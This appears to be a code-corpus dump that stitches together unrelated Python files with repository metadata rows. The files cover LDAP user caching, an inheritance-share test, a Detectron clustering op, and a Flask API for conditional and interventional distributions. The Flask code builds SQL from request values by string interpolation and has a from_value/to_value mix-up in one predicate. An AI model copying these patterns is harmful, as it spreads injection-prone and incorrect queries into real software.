netids.remove('+')
univ_info = ldap_plus(sorted(netids))
df = pd.DataFrame(univ_info[1:], columns=univ_info[0])
cols = ['NETID', 'POSITION', 'DEPT', 'NAME', 'SPONSOR']
df = df[cols]
df = df[pd.notna(df.POSITION) | pd.notna(df.DEPT) | pd.notna(df.SPONSOR)]
df.to_csv(f"{base}/cached_users.csv", columns=cols, index=False)
| 31.578947 | 75 | 0.675833 | 182 | 1,200 | 4.406593 | 0.527473 | 0.05985 | 0.033666 | 0.049875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012597 | 0.14 | 1,200 | 37 | 76 | 32.432432 | 0.764535 | 0.035833 | 0 | 0 | 0 | 0 | 0.17128 | 0.019896 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.03125 | 0.15625 | 0 | 0.15625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b68dabbc6ef27b5064c767d7bec2e0782be79bd | 4,777 | py | Python | test_of_inheritance_2.py | JRF-2018/simbd | 7a453562331cf5b41187a8c69e18ec3378004dc1 | [
"ClArtistic"
] | null | null | null | test_of_inheritance_2.py | JRF-2018/simbd | 7a453562331cf5b41187a8c69e18ec3378004dc1 | [
"ClArtistic"
] | 10 | 2021-09-05T13:15:50.000Z | 2022-02-10T06:48:46.000Z | test_of_inheritance_2.py | JRF-2018/simbd | 7a453562331cf5b41187a8c69e18ec3378004dc1 | [
"ClArtistic"
] | null | null | null | #!/usr/bin/python3
__version__ = '0.0.3' # Time-stamp: <2021-10-16T01:25:51Z>
## Language: Japanese/UTF-8
"""相続のテスト"""
##
## License:
##
## Public Domain
## (Since this small code is close to be mathematically trivial.)
##
## Author:
##
## JRF
## http://jrf.cocolog-nifty.com/software/
## (The page is written in Japanese.)
##
from collections import OrderedDict
import argparse
ARGS = argparse.Namespace()
def parse_args ():
parser = argparse.ArgumentParser()
parser.parse_args(namespace=ARGS)
## class 'Frozen' from:
## 《How to freeze Python classes « Python recipes « ActiveState Code》
## https://code.activestate.com/recipes/252158-how-to-freeze-python-classes/
def frozen (set):
"""Raise an error when trying to set an undeclared name, or when calling
from a method other than Frozen.__init__ or the __init__ method of
a class derived from Frozen"""
def set_attr (self,name,value):
import sys
if hasattr(self,name):
#If attribute already exists, simply set it
set(self,name,value)
return
elif sys._getframe(1).f_code.co_name == '__init__':
#Allow __setattr__ calls in __init__ calls of proper object types
for k,v in sys._getframe(1).f_locals.items():
if k=="self" and isinstance(v, self.__class__):
set(self,name,value)
return
raise AttributeError("You cannot add an attribute '%s' to %s"
% (name, self))
return set_attr
class Frozen (object):
"""Subclasses of Frozen are frozen, i.e. it is impossibile to add
new attributes to them and their instances."""
__setattr__=frozen(object.__setattr__)
class __metaclass__ (type):
__setattr__=frozen(type.__setattr__)
class Serializable (Frozen):
def __str__ (self):
r = []
for p, v in self.__dict__.items():
if isinstance(v, list):
r.append(str(p) + ": [" + ', '.join(map(str, v)) + "]")
else:
r.append(str(p) + ": " + str(v))
return '(' + ', '.join(r) + ')'
class Person (Serializable):
def __init__ (self):
self.id = None # ID または 名前
self.death = None
class Death (Serializable):
def __init__ (self):
self.term = None
self.inheritance_share = None
class Economy (Frozen):
def __init__ (self):
self.people = OrderedDict()
def is_living (self, id):
return id in self.people and self.people[id].death is None
def recalc_inheritance_share_1 (economy, inherit_share, excluding):
q = inherit_share
r = {}
if q is None:
return r
for x, y in q.items():
if x not in excluding:
if x in economy.people and economy.people[x].death is not None:
excluding.add(x)
q1 = recalc_inheritance_share_1(economy,
economy.people[x].death
.inheritance_share,
excluding)
for x1, y1 in q1.items():
if x1 not in r:
r[x1] = 0
r[x1] += y * y1
else:
if x not in r:
r[x] = 0
r[x] += y
return r
def recalc_inheritance_share (economy, person):
p = person
assert p.death is not None
r = recalc_inheritance_share_1(economy,
p.death.inheritance_share,
set([person.id]))
if r:
s = sum(list(r.values()))
for x, y in r.items():
r[x] = y / s
return r
else:
return None
def initialize1 (economy):
p0 = Person()
p0.id = 'a'
p0.death = Death()
p0.death.inheritance_share = {
'b': 0.7,
'c': 0.3
}
p1 = Person()
p1.id = 'b'
p1.death = Death()
p1.death.inheritance_share = {
'a': 0.1,
'c': 0.6,
'd': 0.3
}
p2 = Person()
p2.id = 'c'
p3 = Person()
p3.id = 'd'
p3.death = Death()
p3.death.inheritance_share = {
'a': 0.1,
'c': 0.6,
'e': 0.3
}
p4 = Person()
p4.id = 'e'
economy.people = OrderedDict([(p.id, p) for p in [p0, p1, p2, p3, p4]])
def main ():
economy = Economy()
initialize1(economy)
p0 = economy.people['a']
print(recalc_inheritance_share(economy, p0))
if __name__ == '__main__':
parse_args()
main()
| 28.777108 | 78 | 0.515386 | 577 | 4,777 | 4.083189 | 0.305026 | 0.074703 | 0.046689 | 0.0191 | 0.12309 | 0.02292 | 0.02292 | 0.02292 | 0.02292 | 0 | 0 | 0.02683 | 0.368013 | 4,777 | 165 | 79 | 28.951515 | 0.752898 | 0.169772 | 0 | 0.142857 | 0 | 0 | 0.023905 | 0 | 0 | 0 | 0 | 0 | 0.008403 | 1 | 0.10084 | false | 0 | 0.02521 | 0.008403 | 0.260504 | 0.008403 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b6b492e6ec14da57db531db52f34774d727d4cb | 8,345 | py | Python | detectron/ops/pcl.py | sisrfeng/NA-fWebSOD | 49cb75a9a0d557b05968c6b11b0f17a7043f2077 | [
"Apache-2.0"
] | 23 | 2020-03-30T11:48:33.000Z | 2022-03-11T06:34:31.000Z | detectron/ops/pcl.py | sisrfeng/NA-fWebSOD | 49cb75a9a0d557b05968c6b11b0f17a7043f2077 | [
"Apache-2.0"
] | 9 | 2020-09-28T07:15:16.000Z | 2022-03-25T08:11:06.000Z | detectron/ops/pcl.py | sisrfeng/NA-fWebSOD | 49cb75a9a0d557b05968c6b11b0f17a7043f2077 | [
"Apache-2.0"
] | 10 | 2020-03-30T11:48:34.000Z | 2021-06-02T06:12:36.000Z | import numpy as np
from sklearn.cluster import KMeans
from detectron.core.config import cfg
import detectron.utils.boxes as box_utils
try:
xrange # Python 2
except NameError:
xrange = range # Python 3
cfg_TRAIN_NUM_KMEANS_CLUSTER = 3
cfg_RNG_SEED = 3
cfg_TRAIN_GRAPH_IOU_THRESHOLD = 0.4
cfg_TRAIN_MAX_PC_NUM = 5
cfg_TRAIN_FG_THRESH = 0.5
cfg_TRAIN_BG_THRESH = 0.1
class PCLOp(object):
def __init__(self):
pass
def forward(self, inputs, outputs):
boxes = inputs[0].data
cls_prob = inputs[1].data
im_labels = inputs[2].data
cls_prob_new = inputs[3].data
im_cls_prob = inputs[4].data
boxes = boxes[:, 1:]
pcl_output = PCL(boxes, cls_prob, im_labels, cls_prob_new, im_cls_prob)
outputs[0].reshape(pcl_output['labels'].shape)
outputs[0].data[...] = pcl_output['labels']
outputs[1].reshape(pcl_output['cls_loss_weights'].shape)
outputs[1].data[...] = pcl_output['cls_loss_weights']
outputs[2].reshape(pcl_output['gt_assignment'].shape)
outputs[2].data[...] = pcl_output['gt_assignment']
outputs[3].reshape(pcl_output['pc_labels'].shape)
outputs[3].data[...] = pcl_output['pc_labels']
outputs[4].reshape(pcl_output['pc_probs'].shape)
outputs[4].data[...] = pcl_output['pc_probs']
outputs[5].reshape(pcl_output['pc_count'].shape)
outputs[5].data[...] = pcl_output['pc_count']
outputs[6].reshape(pcl_output['img_cls_loss_weights'].shape)
outputs[6].data[...] = pcl_output['img_cls_loss_weights']
outputs[7].reshape(pcl_output['im_labels_real'].shape)
outputs[7].data[...] = pcl_output['im_labels_real']
def PCL(boxes, cls_prob, im_labels, cls_prob_new, im_cls_prob):
# cls_prob = cls_prob.data.cpu().numpy()
# cls_prob_new = cls_prob_new.data.cpu().numpy()
if cls_prob.shape[1] != im_labels.shape[1]:
cls_prob = cls_prob[:, 1:]
im_cls_prob = None
eps = 1e-9
cls_prob[cls_prob < eps] = eps
cls_prob[cls_prob > 1 - eps] = 1 - eps
cls_prob_new[cls_prob_new < eps] = eps
cls_prob_new[cls_prob_new > 1 - eps] = 1 - eps
proposals = _get_graph_centers(boxes.copy(), cls_prob.copy(),
im_labels.copy(), im_cls_prob)
labels, cls_loss_weights, gt_assignment, pc_labels, pc_probs, \
pc_count, img_cls_loss_weights = _get_proposal_clusters(boxes.copy(),
proposals, im_labels.copy(), cls_prob_new.copy())
return {'labels' : labels.reshape(1, -1).astype(np.float32).copy(),
'cls_loss_weights' : cls_loss_weights.reshape(1, -1).astype(np.float32).copy(),
'gt_assignment' : gt_assignment.reshape(1, -1).astype(np.float32).copy(),
'pc_labels' : pc_labels.reshape(1, -1).astype(np.float32).copy(),
'pc_probs' : pc_probs.reshape(1, -1).astype(np.float32).copy(),
'pc_count' : pc_count.reshape(1, -1).astype(np.float32).copy(),
'img_cls_loss_weights' : img_cls_loss_weights.reshape(1, -1).astype(np.float32).copy(),
'im_labels_real' : np.hstack((np.array([[1]]), im_labels)).astype(np.float32).copy()}
def _get_top_ranking_propoals(probs):
"""Get top ranking proposals by k-means"""
kmeans = KMeans(n_clusters=cfg_TRAIN_NUM_KMEANS_CLUSTER,
random_state=cfg_RNG_SEED).fit(probs)
high_score_label = np.argmax(kmeans.cluster_centers_)
index = np.where(kmeans.labels_ == high_score_label)[0]
if len(index) == 0:
index = np.array([np.argmax(probs)])
return index
def _build_graph(boxes, iou_threshold):
"""Build graph based on box IoU"""
overlaps = box_utils.bbox_overlaps(
boxes.astype(dtype=np.float32, copy=False),
boxes.astype(dtype=np.float32, copy=False))
return (overlaps > iou_threshold).astype(np.float32)
def _get_graph_centers(boxes, cls_prob, im_labels, im_cls_prob):
"""Get graph centers."""
num_images, num_classes = im_labels.shape
assert num_images == 1, 'batch size shoud be equal to 1'
im_labels_tmp = im_labels[0, :].copy()
gt_boxes = np.zeros((0, 4), dtype=np.float32)
gt_classes = np.zeros((0, 1), dtype=np.int32)
gt_scores = np.zeros((0, 1), dtype=np.float32)
for i in xrange(num_classes):
if im_labels_tmp[i] == 1:
cls_prob_tmp = cls_prob[:, i].copy()
idxs = np.where(cls_prob_tmp >= 0)[0]
idxs_tmp = _get_top_ranking_propoals(cls_prob_tmp[idxs].reshape(-1, 1))
idxs = idxs[idxs_tmp]
boxes_tmp = boxes[idxs, :].copy()
cls_prob_tmp = cls_prob_tmp[idxs]
graph = _build_graph(boxes_tmp, cfg_TRAIN_GRAPH_IOU_THRESHOLD)
keep_idxs = []
gt_scores_tmp = []
count = cls_prob_tmp.size
while True:
order = np.sum(graph, axis=1).argsort()[::-1]
tmp = order[0]
keep_idxs.append(tmp)
inds = np.where(graph[tmp, :] > 0)[0]
if im_cls_prob is None:
gt_scores_tmp.append(np.max(cls_prob_tmp[inds]))
else:
gt_scores_tmp.append(im_cls_prob[0, i])
graph[:, inds] = 0
graph[inds, :] = 0
count = count - len(inds)
if count <= 5:
break
gt_boxes_tmp = boxes_tmp[keep_idxs, :].copy()
gt_scores_tmp = np.array(gt_scores_tmp).copy()
keep_idxs_new = np.argsort(gt_scores_tmp)\
[-1:(-1 - min(len(gt_scores_tmp), cfg_TRAIN_MAX_PC_NUM)):-1]
gt_boxes = np.vstack((gt_boxes, gt_boxes_tmp[keep_idxs_new, :]))
gt_scores = np.vstack((gt_scores,
gt_scores_tmp[keep_idxs_new].reshape(-1, 1)))
gt_classes = np.vstack((gt_classes,
(i + 1) * np.ones((len(keep_idxs_new), 1), dtype=np.int32)))
# If a proposal is chosen as a cluster center,
# we simply delete a proposal from the candidata proposal pool,
# because we found that the results of different strategies are similar and this strategy is more efficient
cls_prob = np.delete(cls_prob.copy(), idxs[keep_idxs][keep_idxs_new], axis=0)
boxes = np.delete(boxes.copy(), idxs[keep_idxs][keep_idxs_new], axis=0)
proposals = {'gt_boxes' : gt_boxes,
'gt_classes': gt_classes,
'gt_scores': gt_scores}
return proposals
def _get_proposal_clusters(all_rois, proposals, im_labels, cls_prob):
"""Generate a random sample of RoIs comprising foreground and background
examples.
"""
num_images, num_classes = im_labels.shape
assert num_images == 1, 'batch size shoud be equal to 1'
# overlaps: (rois x gt_boxes)
gt_boxes = proposals['gt_boxes']
gt_labels = proposals['gt_classes']
gt_scores = proposals['gt_scores']
overlaps = box_utils.bbox_overlaps(
all_rois.astype(dtype=np.float32, copy=False),
gt_boxes.astype(dtype=np.float32, copy=False))
gt_assignment = overlaps.argmax(axis=1)
max_overlaps = overlaps.max(axis=1)
labels = gt_labels[gt_assignment, 0]
cls_loss_weights = gt_scores[gt_assignment, 0]
# Select foreground RoIs as those with >= FG_THRESH overlap
fg_inds = np.where(max_overlaps >= cfg_TRAIN_FG_THRESH)[0]
# Select background RoIs as those with < FG_THRESH overlap
bg_inds = np.where(max_overlaps < cfg_TRAIN_FG_THRESH)[0]
ig_inds = np.where(max_overlaps < cfg_TRAIN_BG_THRESH)[0]
cls_loss_weights[ig_inds] = 0.0
labels[bg_inds] = 0
gt_assignment[bg_inds] = -1
img_cls_loss_weights = np.zeros(gt_boxes.shape[0], dtype=np.float32)
pc_probs = np.zeros(gt_boxes.shape[0], dtype=np.float32)
pc_labels = np.zeros(gt_boxes.shape[0], dtype=np.int32)
pc_count = np.zeros(gt_boxes.shape[0], dtype=np.int32)
for i in xrange(gt_boxes.shape[0]):
po_index = np.where(gt_assignment == i)[0]
img_cls_loss_weights[i] = np.sum(cls_loss_weights[po_index])
pc_labels[i] = gt_labels[i, 0]
pc_count[i] = len(po_index)
pc_probs[i] = np.average(cls_prob[po_index, pc_labels[i]])
return labels, cls_loss_weights, gt_assignment, pc_labels, pc_probs, pc_count, img_cls_loss_weights
| 38.279817 | 119 | 0.637987 | 1,225 | 8,345 | 4.043265 | 0.147755 | 0.062185 | 0.048052 | 0.027458 | 0.347668 | 0.255401 | 0.234403 | 0.174036 | 0.147789 | 0.121946 | 0 | 0.023873 | 0.231995 | 8,345 | 217 | 120 | 38.456221 | 0.748947 | 0.074895 | 0 | 0.038961 | 0 | 0 | 0.051569 | 0 | 0 | 0 | 0 | 0 | 0.012987 | 1 | 0.045455 | false | 0.006494 | 0.025974 | 0 | 0.11039 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b6b52bea6e9b40479b6ac3698397020ea08e793 | 19,109 | py | Python | services/python-images/src/master/resources/distributions.py | hpi-epic/mpcsl | 05361acb0c8da68ddfa21f9fc9cd32a59255dc5c | [
"MIT"
] | 1 | 2021-11-21T13:52:36.000Z | 2021-11-21T13:52:36.000Z | services/python-images/src/master/resources/distributions.py | hpi-epic/mpcsl | 05361acb0c8da68ddfa21f9fc9cd32a59255dc5c | [
"MIT"
] | 3 | 2021-10-06T13:23:43.000Z | 2022-01-07T13:48:41.000Z | services/python-images/src/master/resources/distributions.py | hpi-epic/mpcsl | 05361acb0c8da68ddfa21f9fc9cd32a59255dc5c | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
from flask_restful import Resource
from flask_restful_swagger_2 import swagger
from marshmallow import fields, validates, Schema, ValidationError
from src.master.helpers.database import get_db_session
from src.master.helpers.io import marshal, load_data, InvalidInputData
from src.master.helpers.swagger import get_default_response, oneOf
from src.models import Node, BaseSchema
from src.models.swagger import SwaggerMixin
DISCRETE_LIMIT = 10
def _custom_histogram(arr, max_bins=20, **kwargs):
# Use 'auto' binning, but only up to 20 bins
arr = np.asarray(arr)
first_edge, last_edge = arr.min(), arr.max()
width = np.lib.histograms._hist_bin_auto(arr, (first_edge, last_edge))
bin_count = min(max_bins, int(np.ceil((last_edge - first_edge) / width))) if width else 1
return np.histogram(arr, bins=bin_count, **kwargs)
class DistributionSchema(BaseSchema, SwaggerMixin):
node = fields.Nested('NodeSchema')
dataset = fields.Nested('DatasetSchema')
categorical = fields.Bool()
class ContinuousDistributionSchema(DistributionSchema):
bins = fields.List(fields.Int())
bin_edges = fields.List(fields.Float())
categorical = fields.Constant(False, dump_only=True)
class DiscreteDistributionSchema(DistributionSchema):
bins = fields.Dict(keys=fields.String(), values=fields.Int()) # Not enforced, just metadata in 2.x
categorical = fields.Constant(True, dump_only=True)
class MarginalDistributionResource(Resource):
@swagger.doc({
'description': 'Returns the marginal distribution of an attribute as histogram values. '
'If the distribution is categorical, there is no bin_edges and bins '
'is a dictionary mapping values to counts',
'parameters': [
{
'name': 'node_id',
'description': 'Node identifier',
'in': 'path',
'type': 'integer',
'required': True
}
],
'responses': get_default_response(oneOf([DiscreteDistributionSchema,
ContinuousDistributionSchema]).get_swagger()),
'tags': ['Node', 'Distribution']
})
def get(self, node_id):
node = Node.query.get_or_404(node_id)
dataset = node.dataset
session = get_db_session(dataset)
result = session.execute(f"SELECT \"{node.name}\" FROM ({dataset.load_query}) _subquery_").fetchall()
values = [line[0] for line in result]
if len(np.unique(values)) <= DISCRETE_LIMIT: # Categorical
bins = dict([(str(k), int(v)) for k, v in zip(*np.unique(values, return_counts=True))])
return marshal(DiscreteDistributionSchema, {
'node': node,
'dataset': dataset,
'bins': bins
})
else:
hist, bin_edges = _custom_histogram(values, density=False)
return marshal(ContinuousDistributionSchema, {
'node': node,
'dataset': dataset,
'bins': hist,
'bin_edges': bin_edges
})
class DiscreteConditionSchema(Schema, SwaggerMixin):
categorical = fields.Constant(True)
values = fields.List(fields.String)
class ContinuousConditionSchema(Schema, SwaggerMixin):
categorical = fields.Constant(False)
from_value = fields.Float()
to_value = fields.Float()
class AutoConditionSchema(Schema, SwaggerMixin):
auto = fields.Constant(True)
class ConditionalParameterSchema(Schema, SwaggerMixin):
conditions = fields.Dict(keys=fields.Int(), values=fields.Dict()) # Not enforced, just metadata in 2.x
@validates('conditions')
def validate_params(self, conds):
for key, val in conds.items():
if not isinstance(val.get('auto', False), bool):
raise ValidationError(f'Field `auto` must be bool for key {key}')
if not val.get('auto', False):
if 'categorical' not in val or not isinstance(val['categorical'], bool):
raise ValidationError(f'Field `categorical` must be bool for key {key}')
if val['categorical']:
if 'values' not in val or not isinstance(val['values'], list):
raise ValidationError(f'Field `values` must be list for key {key}')
else:
if 'from_value' not in val or not (
isinstance(val['from_value'], int) or isinstance(val['from_value'], float)):
raise ValidationError(f'Field `from_value` must be numeric for key {key}')
if 'to_value' not in val or not (
isinstance(val['to_value'], int) or isinstance(val['to_value'], float)):
raise ValidationError(f'Field `to_value` must be numeric for key {key}')
class ConditionalContinuousDistributionSchema(ContinuousDistributionSchema):
conditions = fields.Dict(keys=fields.Int(), values=fields.Dict())
class ConditionalDiscreteDistributionSchema(DiscreteDistributionSchema):
conditions = fields.Dict(keys=fields.Int(), values=fields.Dict())
class ConditionalDistributionResource(Resource):
@swagger.doc({
'description': 'Returns the conditional distribution of an attribute as histogram values. '
'If the distribution is categorical, there is no bin_edges and bins '
'is a dictionary mapping values to counts. ',
'parameters': [
{
'name': 'node_id',
'description': 'Node identifier',
'in': 'path',
'type': 'integer',
'required': True
},
{
'name': 'conditions',
'description': 'Dictionary mapping from node id to condition. There are three types of conditions, '
'continuous, discrete and automatic ones where the most common value or interval '
'is picked. For continuous conditions, from_value and to_value represent an inclusive'
'interval.',
'in': 'body',
'schema': {
'type': 'object',
'additionalProperties': oneOf([DiscreteConditionSchema, ContinuousConditionSchema,
AutoConditionSchema]).get_swagger(True),
'example': {
'234': {
'categorical': True,
'values': ['3224', '43']
},
'4356': {
'categorical': False,
'from_value': 2.12,
'to_value': 2.79
},
'95652': {
'auto': True
},
}
}
}
],
'responses': get_default_response(oneOf([ConditionalDiscreteDistributionSchema,
ConditionalContinuousDistributionSchema]).get_swagger()),
'tags': ['Node', 'Distribution']
})
def post(self, node_id):
node = Node.query.get_or_404(node_id)
dataset = node.dataset
session = get_db_session(dataset)
conditions = load_data(ConditionalParameterSchema)['conditions']
base_query = f"SELECT \"{node.name}\" FROM ({dataset.load_query}) _subquery_"
base_result = session.execute(base_query).fetchall()
_, node_bins = _custom_histogram([line[0] for line in base_result])
predicates = []
for condition_node_id, condition in conditions.items():
node_name = Node.query.get_or_404(condition_node_id).name
# Auto-generate ranges by picking largest frequency
if condition.get('auto', False):
node_res = session.execute(f"SELECT \"{node_name}\" "
f"FROM ({dataset.load_query}) _subquery_").fetchall()
node_data = [line[0] for line in node_res]
if len(np.unique(node_data)) <= DISCRETE_LIMIT:
values, counts = np.unique(node_data, return_counts=True)
condition['values'] = [int(values[np.argmax(counts)])]
condition['categorical'] = True
else:
hist, bin_edges = _custom_histogram(node_data, density=False)
most_common = np.argmax(hist)
condition['from_value'] = bin_edges[most_common]
condition['to_value'] = bin_edges[most_common+1]
condition['categorical'] = False
if condition['categorical']:
predicates.append(f"\"{node_name}\" IN ({','.join(map(repr, condition['values']))})")
else:
predicates.append(f"\"{node_name}\" >= {repr(condition['from_value'])}")
predicates.append(f"\"{node_name}\" <= {repr(condition['to_value'])}")
categorical_check = session.execute(f"SELECT 1 FROM ({dataset.load_query}) _subquery_ "
f"HAVING COUNT(DISTINCT \"{node.name}\") <= {DISCRETE_LIMIT}").fetchall()
is_categorical = len(categorical_check) > 0
query = base_query if len(predicates) == 0 else base_query + " WHERE " + ' AND '.join(predicates)
result = session.execute(query).fetchall()
data = [line[0] for line in result]
if is_categorical: # Categorical
bins = dict([(str(k), int(v)) for k, v in zip(*np.unique(data, return_counts=True))])
return marshal(ConditionalDiscreteDistributionSchema, {
'node': node,
'dataset': dataset,
'bins': bins,
'conditions': conditions
})
else:
hist, bin_edges = np.histogram(data, bins=node_bins, density=False)
return marshal(ConditionalContinuousDistributionSchema, {
'node': node,
'dataset': dataset,
'bins': hist,
'bin_edges': bin_edges,
'conditions': conditions
})
class InterventionalParameterSchema(Schema, SwaggerMixin):
cause_node_id = fields.Int(required=True)
effect_node_id = fields.Int(required=True)
factor_node_ids = fields.List(fields.Int(), default=[])
cause_condition = fields.Dict()
@validates('cause_condition')
def validate_params(self, cond):
if DiscreteConditionSchema().validate(cond) and ContinuousConditionSchema().validate(cond): # errors on both
raise ValidationError('Condition must conform to DiscreteConditionSchema or ContinuousConditionSchema')
class InterventionalDistributionResource(Resource):
@swagger.doc({
'description': '',
'parameters': [
{
'name': 'cause_node_id',
'description': 'Node identifier of cause',
'in': 'body',
'schema': {
'type': 'integer',
},
'required': True
},
{
'name': 'effect_node_id',
'description': 'Node identifier of effect',
'in': 'body',
'schema': {
'type': 'integer',
},
'required': True
},
{
'name': 'factor_node_ids',
'description': 'Node identifiers of external factors',
'in': 'body',
'schema': {
'type': 'array',
'items': {'type': 'integer'},
},
'default': []
},
{
'name': 'cause_condition',
'description': 'Interventional value(s) of cause',
'required': True,
'in': 'body',
'schema': oneOf([DiscreteConditionSchema, ContinuousConditionSchema]).get_swagger(True)
}
],
'responses': get_default_response(oneOf([DiscreteDistributionSchema,
ContinuousDistributionSchema]).get_swagger()),
'tags': ['Node', 'Distribution']
})
def post(self):
data = load_data(InterventionalParameterSchema)
cause_condition = data['cause_condition']
cause_node = Node.query.get_or_404(data['cause_node_id'])
effect_node = Node.query.get_or_404(data['effect_node_id'])
try:
factor_node_ids = data.get('factor_node_ids', [])
factor_nodes = [Node.query.get_or_404(factor_node_id) for factor_node_id in factor_node_ids]
except ValueError:
raise InvalidInputData('factor_node_ids must be array of ints')
if effect_node in factor_nodes:
raise InvalidInputData('The effect cannot be a predecessor of the cause')
dataset = effect_node.dataset
if not all([n.dataset == dataset for n in [cause_node] + factor_nodes]):
raise InvalidInputData('Nodes are not all from same dataset')
session = get_db_session(dataset)
categorical_query = (f"SELECT 1 FROM ({dataset.load_query}) _subquery_ HAVING "
f"COUNT(DISTINCT \"{effect_node.name}\") <= {DISCRETE_LIMIT} AND "
f"COUNT(DISTINCT \"{cause_node.name}\") <= {DISCRETE_LIMIT}")
for factor_node in factor_nodes:
categorical_query += f" AND COUNT(DISTINCT \"{factor_node.name}\") <= {DISCRETE_LIMIT}"
categorical_check = session.execute(categorical_query).fetchall()
is_fully_categorical = len(categorical_check) > 0
if is_fully_categorical: # Categorical, can be done in DB
# cause c, effect e, factors F
# P(e|do(c)) = \Sigma_{F} P(e|c,f) P(f)
category_query = session.execute(f"SELECT DISTINCT \"{effect_node.name}\" "
f"FROM ({dataset.load_query}) _subquery_").fetchall()
categories = [row[0] for row in category_query]
num_of_obs = session.execute(f"SELECT COUNT(*) FROM ({dataset.load_query}) _subquery_").fetchone()[0]
if cause_condition['categorical']:
cause_predicate = (f"_subquery_.\"{cause_node.name}\" IN "
f"({','.join(map(repr, cause_condition['values']))})")
else:
cause_predicate = (f"_subquery_.\"{cause_node.name}\" >= {repr(cause_condition['from_value'])} AND "
f"_subquery_.\"{cause_node.name}\" < {repr(cause_condition['from_value'])}")
probabilities = []
for category in categories:
if len(probabilities) == len(categories) - 1: # Probabilities will sum to 1
probabilities.append(1 - sum(probabilities))
else:
do_sql = f"SELECT " \
f"COUNT(*) AS group_count, " \
f"COUNT(CASE WHEN {cause_predicate} THEN 1 ELSE NULL END) AS marginal_count, " \
f"COUNT(CASE WHEN {cause_predicate} " \
f"AND _subquery_.\"{effect_node.name}\"={repr(category)} THEN 1 ELSE NULL END) " \
f"AS conditional_count FROM ({dataset.load_query}) _subquery_ "
if len(factor_nodes) > 0:
factor_str = ','.join(['_subquery_.\"' + n.name + '\"' for n in factor_nodes])
do_sql += f"GROUP BY {factor_str}"
do_query = session.execute(do_sql).fetchall()
group_counts, marg_counts, cond_counts = zip(*[(line[-3], line[-2], line[-1]) for line in do_query])
probability = sum([
(cond_count / marg_count) * (group_count / sum(group_counts))
for group_count, marg_count, cond_count in zip(group_counts, marg_counts, cond_counts)
if marg_count > 0
])
probabilities.append(probability)
bins = dict([(str(cat), round(num_of_obs * float(prob))) for cat, prob in zip(categories, probabilities)])
return marshal(DiscreteDistributionSchema, {
'node': effect_node,
'dataset': dataset,
'bins': bins
})
else:
factor_str = (', ' + ', '.join([f'"{n.name}"' for n in factor_nodes])) if len(factor_nodes) > 0 else ''
result = session.execute(f"SELECT \"{cause_node.name}\", \"{effect_node.name}\"{factor_str} "
f"FROM ({dataset.load_query}) _subquery_").fetchall()
arr = np.array([line for line in result])
_, bin_edges = _custom_histogram(arr[:, 1])
arr[:, 1:] = np.apply_along_axis(
lambda c: np.digitize(c, _custom_histogram(c)[1][:-1]), 0, arr[:, 1:])
df = pd.DataFrame(arr, columns=([cause_node.name] + [effect_node.name] + [f.name for f in factor_nodes]))
probabilities = []
for effect_bin in range(1, len(bin_edges) - 1):
group_counts, marg_counts, cond_counts = [], [], []
factor_grouping = df.groupby(df.columns[2:].tolist()) if len(df.columns) > 2 else [('', df)]
for factor_group, factor_df in factor_grouping:
if cause_condition['categorical']:
cause_mask = factor_df[cause_node.name].isin(cause_condition['values'])
else:
cause_mask = ((factor_df[cause_node.name] >= cause_condition['from_value']) &
(factor_df[cause_node.name] < cause_condition['to_value']))
group_counts.append(len(factor_df))
marg_counts.append(len(factor_df[cause_mask]))
cond_counts.append(len(factor_df[cause_mask & (factor_df[effect_node.name] == effect_bin)]))
probability = sum([
(cond_count / marg_count) * (group_count / sum(group_counts))
for group_count, marg_count, cond_count in zip(group_counts, marg_counts, cond_counts)
if marg_count > 0
])
probabilities.append(probability)
probabilities.append(1 - sum(probabilities))
bins = [round(len(df) * float(prob)) for prob in probabilities]
return marshal(ContinuousDistributionSchema, {
'node': effect_node,
'dataset': dataset,
'bins': bins,
'bin_edges': bin_edges,
})
| 46.045783 | 120 | 0.55466 | 1,913 | 19,109 | 5.358599 | 0.147935 | 0.01873 | 0.013169 | 0.017559 | 0.420349 | 0.345137 | 0.27568 | 0.196274 | 0.171203 | 0.149254 | 0 | 0.006816 | 0.33199 | 19,109 | 414 | 121 | 46.157005 | 0.79624 | 0.017112 | 0 | 0.332378 | 0 | 0 | 0.184976 | 0.023015 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017192 | false | 0 | 0.028653 | 0 | 0.163324 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b6da9f79d2796f8456fd3c992ddac850201f870 | 18,233 | py | Python | ginga/qtw/plugins/Pick.py | Rbeaty88/ginga | 08451a81288b8defc54aa9f9e2af23a9ba32e985 | [
"BSD-3-Clause"
] | 1 | 2016-03-21T15:56:15.000Z | 2016-03-21T15:56:15.000Z | ginga/qtw/plugins/Pick.py | Rbeaty88/ginga | 08451a81288b8defc54aa9f9e2af23a9ba32e985 | [
"BSD-3-Clause"
] | null | null | null | ginga/qtw/plugins/Pick.py | Rbeaty88/ginga | 08451a81288b8defc54aa9f9e2af23a9ba32e985 | [
"BSD-3-Clause"
] | null | null | null | #
# Pick.py -- Pick plugin for Ginga fits viewer
#
# Eric Jeschke (eric@naoj.org)
#
